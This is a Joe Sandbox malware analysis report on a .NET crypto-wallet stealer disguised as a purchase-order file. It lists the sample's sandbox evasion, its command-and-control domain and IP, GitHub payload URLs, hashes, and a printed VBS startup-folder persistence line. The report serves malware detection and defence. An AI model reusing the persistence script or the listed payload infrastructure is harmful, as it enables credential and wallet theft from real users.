                  Source: InstallUtil.exe, 00000002.00000002.71821802467.0000000003244000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q1C:\Users\user\AppData\Roaming\Ethereum\keystore
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus Web3
                  Source: InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                  Source: PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69504846703.0000000006310000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                  Source: Yara matchFile source: 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6340, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 6000, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		Valid Accounts321
                  Windows Management Instrumentation                  		111
                  Scripting                  		212
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping621
                  Security Software Discovery                  		Remote Services1
                  Archive Collected Data                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job2
                  Registry Run Keys / Startup Folder                  		2
                  Registry Run Keys / Startup Folder                  		1
                  Disable or Modify Tools                  		LSASS Memory2
                  Process Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		1
                  Non-Standard Port                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		341
                  Virtualization/Sandbox Evasion                  		Security Account Manager341
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Ingress Tool Transfer                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook212
                  Process Injection                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                  Obfuscated Files or Information                  		LSA Secrets1
                  File and Directory Discovery                  		SSHKeylogging113
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials213
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586913 Sample: PO-12202432_ACD_Group.pif.exe Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 29 pureeratee.duckdns.org 2->29 31 www.chirreeirl.com 2->31 33 chirreeirl.com 2->33 55 Suricata IDS alerts for network traffic 2->55 57 Antivirus / Scanner detection for submitted sample 2->57 59 Multi AV Scanner detection for submitted file 2->59 63 5 other signatures 2->63 8 PO-12202432_ACD_Group.pif.exe 15 5 2->8         started        13 wscript.exe 1 2->13         started        signatures3 61 Uses dynamic DNS services 29->61 process4 dnsIp5 35 chirreeirl.com 209.58.149.225, 443, 49751, 49753 LEASEWEB-USA-DAL-10US United States 8->35 23 C:\Users\user\...\IsNestedFamANDAssem.exe, PE32 8->23 dropped 25 C:\Users\user\...\IsNestedFamANDAssem.vbs, ASCII 8->25 dropped 27 IsNestedFamANDAssem.exe:Zone.Identifier, ASCII 8->27 dropped 65 Found many strings related to Crypto-Wallets (likely being stolen) 8->65 67 Drops VBS files to the startup folder 8->67 69 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->69 73 2 other signatures 8->73 15 InstallUtil.exe 2 8->15         started        71 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->71 19 IsNestedFamANDAssem.exe 14 2 13->19         started        file6 signatures7 process8 dnsIp9 37 pureeratee.duckdns.org 193.187.91.218, 49752, 50787 OBE-EUROPEObenetworkEuropeSE Sweden 15->37 39 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 15->39 41 Found many strings related to Crypto-Wallets (likely being stolen) 15->41 43 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 15->43 51 3 other signatures 15->51 45 Antivirus detection for dropped file 19->45 47 Multi AV Scanner detection for dropped file 19->47 49 Machine Learning detection for dropped file 19->49 53 2 other signatures 19->53 21 InstallUtil.exe 3 19->21         started        signatures10 process11

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  PO-12202432_ACD_Group.pif.exe68%ReversingLabsWin32.Trojan.Leonem
                  PO-12202432_ACD_Group.pif.exe100%AviraTR/AVI.MalwareX.nhsfu
                  PO-12202432_ACD_Group.pif.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe100%AviraTR/AVI.MalwareX.nhsfu
                  C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe68%ReversingLabsWin32.Trojan.Leonem

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://www.chirreeirl.com0%Avira URL Cloudsafe
                  https://www.chirreeirl.com/wp-panel/uploads/Vwibbc.mp40%Avira URL Cloudsafe
                  https://www.chirreeirl.com/0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  pureeratee.duckdns.org
                  		193.187.91.218
                  		truetrue
                    		unknown
                    chirreeirl.com
                    		209.58.149.225
                    		truefalse
                      		unknown
                      www.chirreeirl.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://www.chirreeirl.com/wp-panel/uploads/Vwibbc.mp4false
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://github.com/mgravell/protobuf-netiPO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmpfalse
                          		high
                          https://stackoverflow.com/q/14436606/23354PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69484926490.00000000029C2000.00000004.00000800.00020000.00000000.sdmp, PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69699448945.00000000031F2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/mgravell/protobuf-netJPO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmpfalse
                              		high
                              https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dllInstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://stackoverflow.com/q/2152978/23354rCannotInstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://stackoverflow.com/q/11564914/23354;PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://stackoverflow.com/q/2152978/23354PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmpfalse
                                      		high
                                      https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exeInstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exeInstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.69853746886.0000000002701000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/mgravell/protobuf-netPO-12202432_ACD_Group.pif.exe, 00000000.00000002.69507142380.0000000006640000.00000004.08000000.00040000.00000000.sdmpfalse
                                            		high
                                            http://www.quovadis.bm0PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69503990803.0000000006040000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71832326017.0000000005970000.00000004.00000020.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69723796661.00000000068C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.chirreeirl.comPO-12202432_ACD_Group.pif.exe, 00000000.00000002.69484926490.0000000002921000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69699448945.0000000003151000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://ocsp.quovadisoffshore.com0PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69503990803.0000000006040000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71832326017.0000000005970000.00000004.00000020.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69723796661.00000000068C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO-12202432_ACD_Group.pif.exe, 00000000.00000002.69484926490.0000000002921000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.71821802467.0000000002F4F000.00000004.00000800.00020000.00000000.sdmp, IsNestedFamANDAssem.exe, 00000004.00000002.69699448945.0000000003151000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.chirreeirl.com/PO-12202432_ACD_Group.pif.exe, 00000000.00000002.69483700366.0000000000CAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  209.58.149.225
                                                  		chirreeirl.comUnited States
                                                  		394380LEASEWEB-USA-DAL-10USfalse
                                                  193.187.91.218
                                                  		pureeratee.duckdns.orgSweden
                                                  		197595OBE-EUROPEObenetworkEuropeSEtrue

                                                  General Information

                                                  Joe Sandbox version:42.0.0 Malachite
                                                  Analysis ID:1586913
                                                  Start date and time:2025-01-09 19:05:31 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 10m 36s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                  Run name:Suspected VM Detection
                                                  Number of analysed new started processes analysed:6
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Sample name:PO-12202432_ACD_Group.pif.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.expl.evad.winEXE@8/4@2/2
                                                  EGA Information:
                                                  • Successful, ratio: 50%
                                                  HCA Information:
                                                  • Successful, ratio: 89%
                                                  • Number of executed functions: 468
                                                  • Number of non-executed functions: 34
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                                  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                  • Execution Graph export aborted for target InstallUtil.exe, PID 6000 because it is empty
                                                  • Execution Graph export aborted for target InstallUtil.exe, PID 6340 because it is empty
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: PO-12202432_ACD_Group.pif.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  13:07:37API Interceptor16x Sleep call for process: PO-12202432_ACD_Group.pif.exe modified
                                                  13:07:57API Interceptor14499782x Sleep call for process: InstallUtil.exe modified
                                                  13:07:59API Interceptor14x Sleep call for process: IsNestedFamANDAssem.exe modified
                                                  19:07:50AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  209.58.149.225RFQ-12202430_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                    RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                      RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                        https://contract-kitchensbywoodys16713653.brizy.site/Get hashmaliciousUnknownBrowse
                                                          193.187.91.218RFQ-12202430_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                            RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                              RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse

                                                                Domains

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                pureeratee.duckdns.orgRFQ-12202430_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                • 193.187.91.218
                                                                RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                • 193.187.91.218
                                                                RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                • 193.187.91.218

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                LEASEWEB-USA-DAL-10USRFQ-12202430_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                • 209.58.149.225
                                                                https://ccml.io/Get hashmaliciousUnknownBrowse
                                                                • 172.241.26.5
                                                                RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                • 209.58.149.225
                                                                RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                • 209.58.149.225
                                                                xd.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                • 172.241.229.61
                                                                Payload 94.75 (2).225.exeGet hashmaliciousUnknownBrowse
                                                                • 209.58.145.210
                                                                JHPvqMzKbz.exeGet hashmaliciousVidarBrowse
                                                                • 172.241.51.69
                                                                arm7.elfGet hashmaliciousUnknownBrowse
                                                                • 172.241.27.111
                                                                https://bitfinexinvestment.com/Get hashmaliciousUnknownBrowse
                                                                • 209.58.153.106
                                                                OBE-EUROPEObenetworkEuropeSERFQ-12202430_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                • 193.187.91.218
                                                                G6hxXf90i5.exeGet hashmaliciousUnknownBrowse
                                                                • 185.157.162.103
                                                                G6hxXf90i5.exeGet hashmaliciousUnknownBrowse
                                                                • 185.157.162.103
                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XWorm, XmrigBrowse
                                                                • 185.157.162.216
                                                                RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                • 193.187.91.218
                                                                RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                • 193.187.91.218
                                                                ZppxPm0ASs.exeGet hashmaliciousXmrigBrowse
                                                                • 185.157.162.216
                                                                file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                • 185.157.162.216
                                                                file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                • 185.157.162.216

                                                                JA3 Fingerprints

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                3b5074b1b5d032e5620f69f9f700ff0efiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 209.58.149.225
                                                                RFQ-12202430_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                                • 209.58.149.225
                                                                fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 209.58.149.225
                                                                Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                • 209.58.149.225
                                                                Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                • 209.58.149.225
                                                                http://cipassoitalia.itGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                • 209.58.149.225
                                                                JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                • 209.58.149.225
                                                                bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                • 209.58.149.225

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

                                                                Download File
                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1183
                                                                Entropy (8bit):5.356029462517172
                                                                Encrypted:false
                                                                SSDEEP:24:ML9E4K1BIKDE4KhKMaKhRAE4KzDAfE4KnKIE4oKnKo9E4KhROtHM:MxHK1BIYHKh6oRAHKzMfHKntHoAlHKh/
                                                                MD5:54AC8B422C14A1D319806B83D3E54233
                                                                SHA1:A030D676C9697AFAE3D4499EC142700FE059AB38
                                                                SHA-256:A2A67CCAE5BBACFA68E3403DC2F3177F3DA6CD234A0821DA39CB3387C1C5FDFE
                                                                SHA-512:59F41ED9281AED912B0AA719913D351DEC57AF968F490C99D668E033EB2C936B4C813C59C94EB003AE59DB06EEBCCCC8E5426AAE58D003C04B443EC2159B6643
                                                                Malicious:false
                                                                Reputation:low
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\10879c5bddb2dd2399e2098d5ca5c9d1\System.Xml.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\b863adc9d550931e279ac7e2ee517d1f\System.Configuration.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=n

                                                                C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe

                                                                Download File
                                                                Process:C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):27136
                                                                Entropy (8bit):5.516192210902329
                                                                Encrypted:false
                                                                SSDEEP:384:RTo2ZKanPS/jKkWS+72x+oVQ4ZHiYzfmP4a0fIMbRodF5YHqZlEOmWVYvZ:omsz+72x+qQUicfFfdE0AiB
                                                                MD5:95BEC6594E293A42F4ABB049EA7E81DB
                                                                SHA1:36ECE8150F0619FC81BBF92BD840CAD252BF1AEA
                                                                SHA-256:43057C1F8E32C29342CFB790C692C291F33526F9BE1380758B9C7C42344A5948
                                                                SHA-512:51989412F10AA223E52190587EBF20D0EF447C96D75B9C1D6592DB9C1814D9F56C213CF4B2AD1543D5FC5F20A775D0DB55820D5725A88EF983C454020E6A68C4
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                Reputation:low
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.xg.................`..........2~... ........@.. ....................................`..................................}..J.......~............................................................................ ............... ..H............text...8^... ...`.................. ..`.rsrc...~............b..............@..@.reloc...............h..............@..B.................~......H........D...9...........................................................0..]........d+>.%-.+;.-.+.+7+8Y.-.+5+6.,..X+2+3+42..,.r...p..(....(....(....*.+..+..+..+..+..+..+..+..+......( ...*..( ...*B+..+.*.+.(....+.....0..R.......+C+D~5...%-.&~4.....p...s!...%.5...~6...%-.&~4.....q...s"...%.6...+.*.+..+.(...++....s#...%(.....+.u....r1..p .......+.+.*o$...+.o%...+.o&...+...+.&*(....+..0..........8....-.rE..p8....z8....-.rQ..p8....z8....8....8.....8....8....8..........XoK....,...

                                                                C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe:Zone.Identifier

                                                                Download File
                                                                Process:C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:modified
                                                                Size (bytes):26
                                                                Entropy (8bit):3.95006375643621
                                                                Encrypted:false
                                                                SSDEEP:3:ggPYV:rPYV
                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                Malicious:true
                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsNestedFamANDAssem.vbs

                                                                Download File
                                                                Process:C:\Users\user\Desktop\PO-12202432_ACD_Group.pif.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):95
                                                                Entropy (8bit):4.8084617674117025
                                                                Encrypted:false
                                                                SSDEEP:3:FER/n0eFHHoONtkEaKC5fmVhRt0dinn:FER/lFHICNaZ5fmV3t0din
                                                                MD5:6587E543BBDCFEDAD9DE9CB958598347
                                                                SHA1:6F8B87648A6E3182269EDCC4E8C5F8BB1EB5009C
                                                                SHA-256:BF35E0814D67B0F0B571D888330ED7E11DFE64C211BB1EC1A35F110C52B7E563
                                                                SHA-512:4AE50068A003B954D831527B493C0E5CB0FC6A2387BD8C60D27CDA05C4949347AB244982121CEF058E86516D9817A6A9CDA895DF29A42CDAAF1698A95F5A2408
                                                                Malicious:true
                                                                Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\IsNestedFamANDAssem.exe"""

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):5.516192210902329
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                File name:PO-12202432_ACD_Group.pif.exe
                                                                File size:27'136 bytes
                                                                MD5:95bec6594e293a42f4abb049ea7e81db
                                                                SHA1:36ece8150f0619fc81bbf92bd840cad252bf1aea
                                                                SHA256:43057c1f8e32c29342cfb790c692c291f33526f9be1380758b9c7c42344a5948
                                                                SHA512:51989412f10aa223e52190587ebf20d0ef447c96d75b9c1d6592db9c1814d9f56c213cf4b2ad1543d5fc5f20a775d0db55820d5725a88ef983c454020e6a68c4
                                                                SSDEEP:384:RTo2ZKanPS/jKkWS+72x+oVQ4ZHiYzfmP4a0fIMbRodF5YHqZlEOmWVYvZ:omsz+72x+qQUicfFfdE0AiB
                                                                TLSH:C7C26B6CC3D81A62CBFE5F3A98F55340877AFB0EB99BE75F088435CA5E027A4445071A
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.xg.................`..........2~... ........@.. ....................................`................................

                                                                File Icon

                                                                Icon Hash:90cececece8e8eb0

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x407e32
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x6778044F [Fri Jan 3 15:37:51 2025 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
